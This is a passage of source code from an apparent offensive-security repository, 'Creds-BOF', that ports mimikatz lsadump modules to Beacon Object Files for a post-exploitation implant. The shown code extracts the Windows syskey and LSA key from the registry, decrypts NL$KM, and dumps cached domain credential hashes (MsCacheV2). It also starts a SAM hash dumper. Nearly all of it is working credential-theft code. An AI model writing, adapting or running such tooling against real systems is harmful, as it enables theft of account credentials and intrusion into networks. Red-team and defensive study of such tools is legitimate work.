            ADVAPI32$CryptDestroyKey(hKeyCBC);
            return FALSE;
        }
        MSVCRT$memcpy(decrypted + i * 16, block, 16);
        MSVCRT$memcpy(prevCipher, tmp, 16);
    }

    ADVAPI32$CryptDestroyKey(hKeyCBC);

    DWORD lastBlockSize = encLen - (numBlocks - 1) * 16;
    BYTE* Cn_1 = (BYTE*)(encrypted + (numBlocks - 2) * 16);
    BYTE* Cn = (BYTE*)(encrypted + (numBlocks - 1) * 16);

    hKeyECB = CreateAES128Key(hProv, key, CRYPT_MODE_ECB);
    if (!hKeyECB) return FALSE;

    BYTE intermediate[16];
    MSVCRT$memcpy(intermediate, Cn_1, 16);
    blockLen = 16;
    ADVAPI32$CryptDecrypt(hKeyECB, 0, FALSE, 0, intermediate, &blockLen);

    BYTE paddedCn[16];
    MSVCRT$memset(paddedCn, 0, 16);
    MSVCRT$memcpy(paddedCn, Cn, lastBlockSize);
    for (i = lastBlockSize; i < 16; i++)
        paddedCn[i] = intermediate[i];

    BYTE Pn[16];
    for (i = 0; i < 16; i++)
        Pn[i] = intermediate[i] ^ paddedCn[i];
    MSVCRT$memcpy(decrypted + (numBlocks - 1) * 16, Pn, lastBlockSize);

    MSVCRT$memcpy(block, paddedCn, 16);
    blockLen = 16;
    ADVAPI32$CryptDecrypt(hKeyECB, 0, FALSE, 0, block, &blockLen);

    for (i = 0; i < 16; i++)
        block[i] ^= prevCipher[i];

    MSVCRT$memcpy(decrypted + (numBlocks - 2) * 16, block, 16);
    ADVAPI32$CryptDestroyKey(hKeyECB);

    return TRUE;
}

// ============================================================================
// Get LSA key from PolEKList
// ============================================================================

static BOOL GetLsaKey(HKEY hSecurity, const BYTE sysKey[SYSKEY_LENGTH], BYTE lsaKey[AES_256_KEY_SIZE], HCRYPTPROV hProv) {
    HKEY hPolicy, hPolKey;
    DWORD size, type;
    BYTE* polEKList = NULL;
    BYTE derivedKey[AES_256_KEY_SIZE];
    DWORD secretSize, encryptedSize;
    LONG res;
    
    res = ADVAPI32$RegOpenKeyExW(hSecurity, L"Policy", 0, KEY_READ, &hPolicy);
    if (res != ERROR_SUCCESS) return FALSE;
    
    res = ADVAPI32$RegOpenKeyExW(hPolicy, L"PolEKList", 0, KEY_READ, &hPolKey);
    if (res != ERROR_SUCCESS) {
        ADVAPI32$RegCloseKey(hPolicy);
        return FALSE;
    }
    
    size = 0;
    ADVAPI32$RegQueryValueExW(hPolKey, NULL, NULL, &type, NULL, &size);
    if (size < 60) {
        ADVAPI32$RegCloseKey(hPolKey);
        ADVAPI32$RegCloseKey(hPolicy);
        return FALSE;
    }
    
    polEKList = (BYTE*)AllocMem(size);
    if (!polEKList) {
        ADVAPI32$RegCloseKey(hPolKey);
        ADVAPI32$RegCloseKey(hPolicy);
        return FALSE;
    }
    
    res = ADVAPI32$RegQueryValueExW(hPolKey, NULL, NULL, NULL, polEKList, &size);
    ADVAPI32$RegCloseKey(hPolKey);
    ADVAPI32$RegCloseKey(hPolicy);
    if (res != ERROR_SUCCESS) { FreeMem(polEKList); return FALSE; }
    
    if (!DeriveKey(hProv, sysKey, SYSKEY_LENGTH, polEKList + 28, LAZY_NT6_IV_SIZE, 1000, derivedKey, AES_256_KEY_SIZE)) {
        FreeMem(polEKList);
        return FALSE;
    }
    
    encryptedSize = size - 60;
    if (encryptedSize < 32) { FreeMem(polEKList); return FALSE; }
    
    if (!DecryptAES256_ECB(hProv, derivedKey, polEKList + 60, encryptedSize, polEKList + 60)) {
        FreeMem(polEKList);
        return FALSE;
    }
    
    secretSize = *(DWORD*)(polEKList + 60);
    if (secretSize == 0 || secretSize > encryptedSize) {
        FreeMem(polEKList);
        return FALSE;
    }
    
    BYTE* keysData = polEKList + 60 + 16;
    DWORD nbKeys = *(DWORD*)(keysData + 24);
    if (nbKeys == 0) {
        FreeMem(polEKList);
        return FALSE;
    }
    
    BYTE* firstKey = keysData + 28;
    DWORD keySize = *(DWORD*)(firstKey + 20);
    if (keySize > 32) keySize = 32;
    MSVCRT$memcpy(lsaKey, firstKey + 24, keySize);
    
    FreeMem(polEKList);
    return TRUE;
}

// ============================================================================
// Decrypt NL$KM secret
// ============================================================================

static BOOL GetNLKM(HKEY hSecurity, const BYTE lsaKey[AES_256_KEY_SIZE], BYTE nlkm[16], HCRYPTPROV hProv) {
    HKEY hCurrVal;
    DWORD size, type, encryptedSize, secretSize;
    BYTE* encData = NULL;
    BYTE derivedKey[AES_256_KEY_SIZE];
    LONG res;
    
    res = ADVAPI32$RegOpenKeyExW(hSecurity, L"Policy\\Secrets\\NL$KM\\CurrVal", 0, KEY_READ, &hCurrVal);
    if (res != ERROR_SUCCESS) return FALSE;
    
    size = 0;
    ADVAPI32$RegQueryValueExW(hCurrVal, NULL, NULL, &type, NULL, &size);
    if (size < 60) {
        ADVAPI32$RegCloseKey(hCurrVal);
        return FALSE;
    }
    
    encData = (BYTE*)AllocMem(size);
    if (!encData) { ADVAPI32$RegCloseKey(hCurrVal); return FALSE; }
    
    res = ADVAPI32$RegQueryValueExW(hCurrVal, NULL, NULL, NULL, encData, &size);
    ADVAPI32$RegCloseKey(hCurrVal);
    if (res != ERROR_SUCCESS) { FreeMem(encData); return FALSE; }
    
    if (!DeriveKey(hProv, lsaKey, AES_256_KEY_SIZE, encData + 28, LAZY_NT6_IV_SIZE, 1000, derivedKey, AES_256_KEY_SIZE)) {
        FreeMem(encData);
        return FALSE;
    }
    
    encryptedSize = size - 60;
    if (encryptedSize < 32) { FreeMem(encData); return FALSE; }
    
    if (!DecryptAES256_ECB(hProv, derivedKey, encData + 60, encryptedSize, encData + 60)) {
        FreeMem(encData);
        return FALSE;
    }
    
    secretSize = *(DWORD*)(encData + 60);
    if (secretSize < 16 || secretSize > encryptedSize) {
        FreeMem(encData);
        return FALSE;
    }
    
    MSVCRT$memcpy(nlkm, encData + 60 + 16, 16);
    
    FreeMem(encData);
    return TRUE;
}

// ============================================================================
// Enumerate and decrypt cached credentials
// ============================================================================

static void EnumerateCache(HKEY hSecurity, const BYTE nlkm[16], HCRYPTPROV hProv) {
    HKEY hCache;
    DWORD nbValues, maxNameLen, maxValueLen, i;
    wchar_t* valueName = NULL;
    BYTE* valueData = NULL;
    BYTE* decrypted = NULL;
    DWORD nameLen, dataLen, type;
    DWORD iter = 10240, iterCount;
    DWORD cacheCount = 0;
    LONG res;
    
    res = ADVAPI32$RegOpenKeyExW(hSecurity, L"Cache", 0, KEY_READ, &hCache);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open Cache: %d\n", res);
        return;
    }
    
    DWORD iterSize = sizeof(iterCount);
    if (ADVAPI32$RegQueryValueExW(hCache, L"NL$IterationCount", NULL, NULL, (LPBYTE)&iterCount, &iterSize) == ERROR_SUCCESS) {
        iter = (iterCount > 10240) ? (iterCount & ~0x3ff) : (iterCount << 10);
        BeaconPrintf(CALLBACK_OUTPUT, "* NL$IterationCount is %u, %u real iteration(s)\n", iterCount, iter);
        if (!iterCount)
            BeaconPrintf(CALLBACK_OUTPUT, "* DCC1 mode!\n");
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "* Iteration is set to default (10240)\n");
    }
    
    if (ADVAPI32$RegQueryInfoKeyW(hCache, NULL, NULL, NULL, NULL, NULL, NULL, &nbValues, &maxNameLen, &maxValueLen, NULL, NULL) != ERROR_SUCCESS) {
        ADVAPI32$RegCloseKey(hCache);
        return;
    }
    
    maxNameLen++;
    valueName = (wchar_t*)AllocMem((maxNameLen + 1) * sizeof(wchar_t));
    valueData = (BYTE*)AllocMem(maxValueLen);
    decrypted = (BYTE*)AllocMem(maxValueLen);
    if (!valueName || !valueData || !decrypted) {
        if (valueName) FreeMem(valueName);
        if (valueData) FreeMem(valueData);
        if (decrypted) FreeMem(decrypted);
        ADVAPI32$RegCloseKey(hCache);
        return;
    }
    
    for (i = 0; i < nbValues; i++) {
        PMSCACHE_ENTRY entry;
        DWORD encDataSize;
        wchar_t* username;
        wchar_t* domain;
        char usernameA[128], domainA[128];
        DWORD j;
        
        nameLen = maxNameLen;
        dataLen = maxValueLen;
        
        if (ADVAPI32$RegEnumValueW(hCache, i, valueName, &nameLen, NULL, &type, valueData, &dataLen) != ERROR_SUCCESS)
            continue;
        
        if (MSVCRT$_wcsnicmp(valueName, L"NL$Control", 10) == 0 ||
            MSVCRT$_wcsnicmp(valueName, L"NL$IterationCount", 17) == 0)
            continue;
        
        entry = (PMSCACHE_ENTRY)valueData;
        
        if (!(entry->flags & 1))
            continue;
        
        encDataSize = dataLen - FIELD_OFFSET_ENC_DATA;
        if (encDataSize < sizeof(MSCACHE_DATA))
            continue;
        
        BeaconPrintf(CALLBACK_OUTPUT, "\n[%S]\n", valueName);
        BeaconPrintf(CALLBACK_OUTPUT, "RID       : %08x (%u)\n", entry->userId, entry->userId);
        
        if (!DecryptAES128_CTS(hProv, nlkm, entry->iv, entry->enc_data, encDataSize, decrypted)) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Decryption failed\n");
            continue;
        }
        
        PMSCACHE_DATA msCacheData = (PMSCACHE_DATA)decrypted;
        
        username = (wchar_t*)(decrypted + sizeof(MSCACHE_DATA));
        for (j = 0; j < entry->szUserName / 2 && j < 127; j++)
            usernameA[j] = (char)username[j];
        usernameA[j] = '\0';
        
        domain = (wchar_t*)((BYTE*)username + SIZE_ALIGN(entry->szUserName, 4));
        for (j = 0; j < entry->szDomainName / 2 && j < 127; j++)
            domainA[j] = (char)domain[j];
        domainA[j] = '\0';
        
        char hashStr[64];
        FormatHex(msCacheData->mshashdata, LM_NTLM_HASH_LENGTH, hashStr, sizeof(hashStr));
        BeaconPrintf(CALLBACK_OUTPUT, "User      : %s\\%s\nMsCacheV2 : %s\n", domainA, usernameA, hashStr);
        
        cacheCount++;
    }
    
    FreeMem(valueName);
    FreeMem(valueData);
    FreeMem(decrypted);
    ADVAPI32$RegCloseKey(hCache);
    
    BeaconPrintf(CALLBACK_OUTPUT, "\n[+] %u cached credential(s)\n", cacheCount);
}

// ============================================================================
// Entry Point
// ============================================================================

void go(char* args, int len) {
    (void)args; (void)len;
    
    HKEY hSystem = NULL, hSecurity = NULL;
    BYTE sysKey[SYSKEY_LENGTH];
    BYTE lsaKey[AES_256_KEY_SIZE];
    BYTE nlkm[16];
    LONG res;
    HCRYPTPROV hProv = 0;
    char hexStr[64];
    
    BeaconPrintf(CALLBACK_OUTPUT, "\n=== lsadump::cache ===\n\n");
    
    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] CryptAcquireContext failed\n");
        return;
    }
    
    res = ADVAPI32$RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SYSTEM", 0, KEY_READ, &hSystem);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open SYSTEM: %d\n", res);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }
    
    if (!GetSyskey(hSystem, sysKey)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to extract syskey\n");
        ADVAPI32$RegCloseKey(hSystem);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }
    FormatHex(sysKey, SYSKEY_LENGTH, hexStr, sizeof(hexStr));
    BeaconPrintf(CALLBACK_OUTPUT, "Syskey: %s\n", hexStr);
    ADVAPI32$RegCloseKey(hSystem);
    
    res = ADVAPI32$RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SECURITY", 0, KEY_READ, &hSecurity);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open SECURITY: %d (need SYSTEM privileges)\n", res);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }
    
    if (!GetLsaKey(hSecurity, sysKey, lsaKey, hProv)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to get LSA key\n");
        ADVAPI32$RegCloseKey(hSecurity);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }
    
    if (!GetNLKM(hSecurity, lsaKey, nlkm, hProv)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to get NL$KM (no cached credentials?)\n");
        ADVAPI32$RegCloseKey(hSecurity);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return;
    }
    FormatHex(nlkm, 16, hexStr, sizeof(hexStr));
    BeaconPrintf(CALLBACK_OUTPUT, "NL$KM : %s\n", hexStr);
    
    EnumerateCache(hSecurity, nlkm, hProv);
    
    ADVAPI32$RegCloseKey(hSecurity);
    ADVAPI32$CryptReleaseContext(hProv, 0);
}


================================================
FILE: Creds-BOF/lsadump/include/cache.h
================================================
/*
 * cache.h - Cache-specific definitions for lsadump_cache BOF
 * by shashinma
 */

#ifndef LSADUMP_CACHE_H
#define LSADUMP_CACHE_H

#include "lsadump.h"

// ============================================================================
// MSCACHE Structures
// ============================================================================

#pragma pack(push, 1)
// MSCACHE_DATA - hash data at the beginning of decrypted enc_data
// Size must be 56 bytes (16+16+24) for correct username offset
typedef struct _MSCACHE_DATA {
    BYTE mshashdata[LM_NTLM_HASH_LENGTH];  // 16: DCC2 hash
    BYTE unkhash[LM_NTLM_HASH_LENGTH];     // 16: unknown hash
    DWORD unk0;                             // 4
    DWORD szSC;                             // 4
    DWORD unkLength;                        // 4
    DWORD unk2;                             // 4
    DWORD unk3;                             // 4
    DWORD unk4;                             // 4
} MSCACHE_DATA, *PMSCACHE_DATA;  // Total: 56 bytes

typedef struct _MSCACHE_ENTRY {
    WORD szUserName;
    WORD szDomainName;
    WORD szEffectiveName;
    WORD szFullName;
    WORD szlogonScript;
    WORD szprofilePath;
    WORD szhomeDirectory;
    WORD szhomeDirectoryDrive;
    DWORD userId;
    DWORD primaryGroupId;
    DWORD groupCount;
    WORD szlogonDomainName;
    WORD unk0;
    FILETIME lastWrite;
    DWORD revision;
    DWORD sidCount;
    DWORD flags;
    DWORD unk1;
    DWORD logonPackage;
    WORD szDnsDomainName;
    WORD szupn;
    BYTE iv[LAZY_NT6_IV_SIZE];
    BYTE cksum[16];
    BYTE enc_data[1];
} MSCACHE_ENTRY, *PMSCACHE_ENTRY;
#pragma pack(pop)

#define FIELD_OFFSET_ENC_DATA (sizeof(MSCACHE_ENTRY) - 1)

#endif // LSADUMP_CACHE_H


================================================
FILE: Creds-BOF/lsadump/include/lsadump.h
================================================
/*
 * lsadump.h - Common definitions for lsadump BOFs
 * by shashinma
 */

#ifndef LSADUMP_H
#define LSADUMP_H

#include <windows.h>
#include "beacon.h"
#include "bofdefs.h"

// ============================================================================
// Common Constants
// ============================================================================

#define SYSKEY_LENGTH           16
#define AES_128_KEY_SIZE        16
#define AES_256_KEY_SIZE        32
#define LAZY_NT6_IV_SIZE        32
#define SHA_DIGEST_LENGTH       20
#define MD4_DIGEST_LENGTH       16
#define LM_NTLM_HASH_LENGTH     16

#define PROV_RSA_AES            24
#define CRYPT_VERIFYCONTEXT     0xF0000000

#define CALG_SHA_256            0x0000800c
#define CALG_SHA1               0x00008004
#define CALG_MD4                0x00008002
#define CALG_AES_256            0x00006610
#define CALG_AES_128            0x0000660e
#define CALG_DES                0x00006601

#define HP_HASHVAL              0x0002
#define KP_MODE                 4
#define KP_IV                   1
#define CRYPT_MODE_ECB          2
#define CRYPT_MODE_CBC          1

#define SIZE_ALIGN(size, alignment) (((size) + (alignment - 1)) & ~(alignment - 1))

// ============================================================================
// Syskey Permutation Table
// ============================================================================

static const BYTE SYSKEY_PERMUT[] = {
    0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00,
    0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04
};

// ============================================================================
// Common Structures
// ============================================================================

#pragma pack(push, 1)
typedef struct _AES_KEY_BLOB {
    BLOBHEADER header;
    DWORD keySize;
    BYTE key[32];
} AES_KEY_BLOB;

typedef struct _AES128_KEY_BLOB {
    BLOBHEADER header;
    DWORD keySize;
    BYTE key[16];
} AES128_KEY_BLOB;
#pragma pack(pop)

#endif // LSADUMP_H


================================================
FILE: Creds-BOF/lsadump/include/sam.h
================================================
/*
 * sam.h - SAM-specific definitions for lsadump_sam BOF
 * by shashinma
 */

#ifndef LSADUMP_SAM_H
#define LSADUMP_SAM_H

#include "lsadump.h"

// ============================================================================
// DES Parity Table
// ============================================================================

static const BYTE ODD_PARITY[] = {
    1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
    16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
    32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
    49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
    64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
    81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
    97, 97, 98, 98, 100, 100, 103, 103, 104, 104, 107, 107, 109, 109, 110, 110,
    112, 112, 115, 115, 117, 117, 118, 118, 121, 121, 122, 122, 124, 124, 127, 127,
    128, 128, 131, 131, 133, 133, 134, 134, 137, 137, 138, 138, 140, 140, 143, 143,
    145, 145, 146, 146, 148, 148, 151, 151, 152, 152, 155, 155, 157, 157, 158, 158,
    161, 161, 162, 162, 164, 164, 167, 167, 168, 168, 171, 171, 173, 173, 174, 174,
    176, 176, 179, 179, 181, 181, 182, 182, 185, 185, 186, 186, 188, 188, 191, 191,
    193, 193, 194, 194, 196, 196, 199, 199, 200, 200, 203, 203, 205, 205, 206, 206,
    208, 208, 211, 211, 213, 213, 214, 214, 217, 217, 218, 218, 220, 220, 223, 223,
    224, 224, 227, 227, 229, 229, 230, 230, 233, 233, 234, 234, 236, 236, 239, 239,
    241, 241, 242, 242, 244, 244, 247, 247, 248, 248, 251, 251, 253, 253, 254, 254
};

// ============================================================================
// SAM Structures
// ============================================================================

#pragma pack(push, 1)
typedef struct _DES_KEY_BLOB {
    BLOBHEADER header;
    DWORD keySize;
    BYTE key[8];
} DES_KEY_BLOB;

typedef struct _OLD_LARGE_INTEGER {
    DWORD LowPart;
    LONG HighPart;
} OLD_LARGE_INTEGER;

typedef struct _SAM_KEY_DATA {
    DWORD Revision;
    DWORD Length;
    BYTE Salt[16];
    BYTE Key[16];
    BYTE CheckSum[16];
    DWORD unk0;
    DWORD unk1;
} SAM_KEY_DATA;

typedef struct _SAM_KEY_DATA_AES {
    DWORD Revision;
    DWORD Length;
    DWORD CheckLen;
    DWORD DataLen;
    BYTE Salt[16];
    BYTE data[32];
} SAM_KEY_DATA_AES;

typedef struct _DOMAIN_ACCOUNT_F {
    WORD Revision;
    WORD unk0;
    DWORD unk1;
    OLD_LARGE_INTEGER CreationTime;
    OLD_LARGE_INTEGER DomainModifiedCount;
    OLD_LARGE_INTEGER MaxPasswordAge;
    OLD_LARGE_INTEGER MinPasswordAge;
    OLD_LARGE_INTEGER ForceLogoff;
    OLD_LARGE_INTEGER LockoutDuration;
    OLD_LARGE_INTEGER LockoutObservationWindow;
    OLD_LARGE_INTEGER ModifiedCountAtLastPromotion;
    DWORD NextRid;
    DWORD PasswordProperties;
    WORD MinPasswordLength;
    WORD PasswordHistoryLength;
    WORD LockoutThreshold;
    WORD unk2;
    DWORD ServerState;
    DWORD ServerRole;
    DWORD UasCompatibilityRequired;
    DWORD unk3;
    SAM_KEY_DATA keys1;
    SAM_KEY_DATA keys2;
    DWORD unk4;
    DWORD unk5;
} DOMAIN_ACCOUNT_F;
#pragma pack(pop)

#endif // LSADUMP_SAM_H


================================================
FILE: Creds-BOF/lsadump/include/secrets.h
================================================
/*
 * secrets.h - LSA Secrets-specific definitions for lsadump_secrets BOF
 * by shashinma
 */

#ifndef LSADUMP_SECRETS_H
#define LSADUMP_SECRETS_H

#include "lsadump.h"

// ============================================================================
// LSA Structure Offsets (packed)
// ============================================================================

// PolEKList offsets
#define OFF_VERSION             0
#define OFF_KEYID               4
#define OFF_ALGORITHM           20
#define OFF_FLAG                24
#define OFF_LAZYIV              28
#define OFF_ENCRYPTED           60

// NT6_CLEAR_SECRET offsets
#define OFF_SECRET_SIZE         0
#define OFF_SECRET_DATA         16

// NT6_SYSTEM_KEYS offsets  
#define OFF_KEYS_UNKTYPE0       0
#define OFF_KEYS_CURRENTKEYID   4
#define OFF_KEYS_UNKTYPE1       20
#define OFF_KEYS_NBKEYS         24
#define OFF_KEYS_KEYS           28

// NT6_SYSTEM_KEY offsets
#define OFF_KEY_KEYID           0
#define OFF_KEY_KEYTYPE         16
#define OFF_KEY_KEYSIZE         20
#define OFF_KEY_KEY             24

// ============================================================================
// LSA Keys Info Structure
// ============================================================================

typedef struct _LSA_KEYS_INFO {
    PBYTE keys;
    DWORD nbKeys;
    BYTE currentKeyId[16];
    BYTE currentKey[64];
    DWORD currentKeySize;
} LSA_KEYS_INFO;

#endif // LSADUMP_SECRETS_H


================================================
FILE: Creds-BOF/lsadump/lsadump_helper.c
================================================
/*
 * common.c - Shared helper functions for lsadump BOFs
 * by shashinma
 * 
 * This file is #included by each lsadump module
 */

#include "include/lsadump.h"

// ============================================================================
// Helper Functions
// ============================================================================

static void FormatHex(const BYTE* data, DWORD len, char* hexStr, DWORD hexStrSize) {
    DWORD i, pos = 0;
    if (len > 200) len = 200;
    for (i = 0; i < len && pos < hexStrSize - 3; i++) {
        hexStr[pos++] = "0123456789abcdef"[(data[i] >> 4) & 0xF];
        hexStr[pos++] = "0123456789abcdef"[data[i] & 0xF];
    }
    hexStr[pos] = '\0';
}

static BOOL HexCharToNibble(wchar_t c, BYTE* nibble) {
    if (c >= L'0' && c <= L'9') { *nibble = (BYTE)(c - L'0'); return TRUE; }
    if (c >= L'a' && c <= L'f') { *nibble = (BYTE)(c - L'a' + 10); return TRUE; }
    if (c >= L'A' && c <= L'F') { *nibble = (BYTE)(c - L'A' + 10); return TRUE; }
    return FALSE;
}

static BOOL HexStringToDword(const wchar_t* hexStr, DWORD hexLen, BYTE* outBytes) {
    DWORD value = 0, i;
    BYTE nibble;
    if (hexLen != 8) return FALSE;
    for (i = 0; i < 8; i++) {
        if (!HexCharToNibble(hexStr[i], &nibble)) return FALSE;
        value = (value << 4) | nibble;
    }
    outBytes[0] = (BYTE)(value & 0xFF);
    outBytes[1] = (BYTE)((value >> 8) & 0xFF);
    outBytes[2] = (BYTE)((value >> 16) & 0xFF);
    outBytes[3] = (BYTE)((value >> 24) & 0xFF);
    return TRUE;
}

// ============================================================================
// Memory Functions
// ============================================================================

static LPVOID AllocMem(SIZE_T size) {
    return KERNEL32$VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
}

static void FreeMem(LPVOID ptr) {
    if (ptr) KERNEL32$VirtualFree(ptr, 0, MEM_RELEASE);
}

// ============================================================================
// Registry Functions
// ============================================================================

static DWORD GetCurrentControlSet(HKEY hSystem) {
    HKEY hSelect;
    DWORD current = 1, size = sizeof(current);
    if (ADVAPI32$RegOpenKeyExW(hSystem, L"Select", 0, KEY_READ, &hSelect) == ERROR_SUCCESS) {
        ADVAPI32$RegQueryValueExW(hSelect, L"Current", NULL, NULL, (LPBYTE)&current, &size);
        ADVAPI32$RegCloseKey(hSelect);
    }
    return current;
}

static BOOL GetSyskey(HKEY hSystem, BYTE sysKey[SYSKEY_LENGTH]) {
    DWORD controlSet;
    wchar_t lsaPath[64];
    HKEY hLsa;
    const wchar_t* subKeys[] = { L"JD", L"Skew1", L"GBG", L"Data" };
    BYTE rawKey[SYSKEY_LENGTH];
    DWORD i;

    controlSet = GetCurrentControlSet(hSystem);
    MSVCRT$swprintf_s(lsaPath, 64, L"ControlSet%03u\\Control\\Lsa", controlSet);

    if (ADVAPI32$RegOpenKeyExW(hSystem, lsaPath, 0, KEY_READ, &hLsa) != ERROR_SUCCESS)
        return FALSE;

    for (i = 0; i < 4; i++) {
        HKEY hSub;
        wchar_t classData[16];
        DWORD classLen = 16;

        if (ADVAPI32$RegOpenKeyExW(hLsa, subKeys[i], 0, KEY_READ, &hSub) != ERROR_SUCCESS) {
            ADVAPI32$RegCloseKey(hLsa);
            return FALSE;
        }

        if (ADVAPI32$RegQueryInfoKeyW(hSub, classData, &classLen, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) {
            ADVAPI32$RegCloseKey(hSub);
            ADVAPI32$RegCloseKey(hLsa);
            return FALSE;
        }

        if (!HexStringToDword(classData, 8, &rawKey[i * 4])) {
            ADVAPI32$RegCloseKey(hSub);
            ADVAPI32$RegCloseKey(hLsa);
            return FALSE;
        }

        ADVAPI32$RegCloseKey(hSub);
    }

    ADVAPI32$RegCloseKey(hLsa);

    for (i = 0; i < SYSKEY_LENGTH; i++)
        sysKey[i] = rawKey[SYSKEY_PERMUT[i]];

    return TRUE;
}

// ============================================================================
// Crypto: SHA-256 based Key Derivation
// ============================================================================

static BOOL DeriveKey(HCRYPTPROV hProv, const BYTE* key, DWORD keyLen, 
                      const BYTE* iv, DWORD ivLen, DWORD iterations,
                      BYTE* outKey, DWORD outKeyLen) {
    HCRYPTHASH hHash = 0;
    DWORD hashLen = 32;
    DWORD i;

    (void)outKeyLen;

    if (!ADVAPI32$CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash))
        return FALSE;

    if (!ADVAPI32$CryptHashData(hHash, key, keyLen, 0)) {
        ADVAPI32$CryptDestroyHash(hHash);
        return FALSE;
    }

    for (i = 0; i < iterations; i++) {
        if (!ADVAPI32$CryptHashData(hHash, iv, ivLen, 0)) {
            ADVAPI32$CryptDestroyHash(hHash);
            return FALSE;
        }
    }

    if (!ADVAPI32$CryptGetHashParam(hHash, HP_HASHVAL, outKey, &hashLen, 0)) {
        ADVAPI32$CryptDestroyHash(hHash);
        return FALSE;
    }

    ADVAPI32$CryptDestroyHash(hHash);
    return TRUE;
}

// ============================================================================
// Crypto: AES-256 ECB Decryption
// ============================================================================

static BOOL DecryptAES256_ECB(HCRYPTPROV hProv, const BYTE* key, 
                               const BYTE* encrypted, DWORD encLen,
                               BYTE* decrypted) {
    AES_KEY_BLOB keyBlob;
    HCRYPTKEY hKey = 0;
    DWORD decLen = encLen;
    DWORD mode = CRYPT_MODE_ECB;

    keyBlob.header.bType = PLAINTEXTKEYBLOB;
    keyBlob.header.bVersion = CUR_BLOB_VERSION;
    keyBlob.header.reserved = 0;
    keyBlob.header.aiKeyAlg = CALG_AES_256;
    keyBlob.keySize = AES_256_KEY_SIZE;
    MSVCRT$memcpy(keyBlob.key, key, AES_256_KEY_SIZE);

    if (!ADVAPI32$CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey))
        return FALSE;

    ADVAPI32$CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&mode, 0);

    MSVCRT$memcpy(decrypted, encrypted, encLen);
    if (!ADVAPI32$CryptDecrypt(hKey, 0, FALSE, 0, decrypted, &decLen)) {
        ADVAPI32$CryptDestroyKey(hKey);
        return FALSE;
    }

    ADVAPI32$CryptDestroyKey(hKey);
    return TRUE;
}

// ============================================================================
// Crypto: AES-128 CBC Decryption
// ============================================================================

static BOOL DecryptAES128_CBC(HCRYPTPROV hProv, const BYTE* key, const BYTE* iv,
                               const BYTE* encrypted, DWORD encLen, BYTE* decrypted) {
    AES128_KEY_BLOB keyBlob;
    HCRYPTKEY hKey = 0;
    DWORD decLen = encLen;
    DWORD mode = CRYPT_MODE_CBC;

    keyBlob.header.bType = PLAINTEXTKEYBLOB;
    keyBlob.header.bVersion = CUR_BLOB_VERSION;
    keyBlob.header.reserved = 0;
    keyBlob.header.aiKeyAlg = CALG_AES_128;
    keyBlob.keySize = AES_128_KEY_SIZE;
    MSVCRT$memcpy(keyBlob.key, key, AES_128_KEY_SIZE);

    if (!ADVAPI32$CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey))
        return FALSE;

    ADVAPI32$CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&mode, 0);
    ADVAPI32$CryptSetKeyParam(hKey, KP_IV, (BYTE*)iv, 0);

    MSVCRT$memcpy(decrypted, encrypted, encLen);
    if (!ADVAPI32$CryptDecrypt(hKey, 0, FALSE, 0, decrypted, &decLen)) {
        ADVAPI32$CryptDestroyKey(hKey);
        return FALSE;
    }

    ADVAPI32$CryptDestroyKey(hKey);
    return TRUE;
}


================================================
FILE: Creds-BOF/lsadump/sam.c
================================================
/*
 * lsadump_sam BOF by shashinma
 * Dumps SAM hashes directly from registry
 * Requires admin privileges
 */

#include "include/sam.h"
#include "lsadump_helper.c"

// ============================================================================
// Crypto: DES ECB Decryption
// ============================================================================

static BOOL DecryptDES_ECB(HCRYPTPROV hProv, const BYTE* key8, 
                            const BYTE* encrypted, DWORD encLen,
                            BYTE* decrypted) {
    DES_KEY_BLOB keyBlob;
    HCRYPTKEY hKey = 0;
    DWORD decLen = encLen;
    DWORD mode = CRYPT_MODE_ECB;

    keyBlob.header.bType = PLAINTEXTKEYBLOB;
    keyBlob.header.bVersion = CUR_BLOB_VERSION;
    keyBlob.header.reserved = 0;
    keyBlob.header.aiKeyAlg = CALG_DES;
    keyBlob.keySize = 8;
    MSVCRT$memcpy(keyBlob.key, key8, 8);

    if (!ADVAPI32$CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey))
        return FALSE;

    ADVAPI32$CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&mode, 0);

    MSVCRT$memcpy(decrypted, encrypted, encLen);
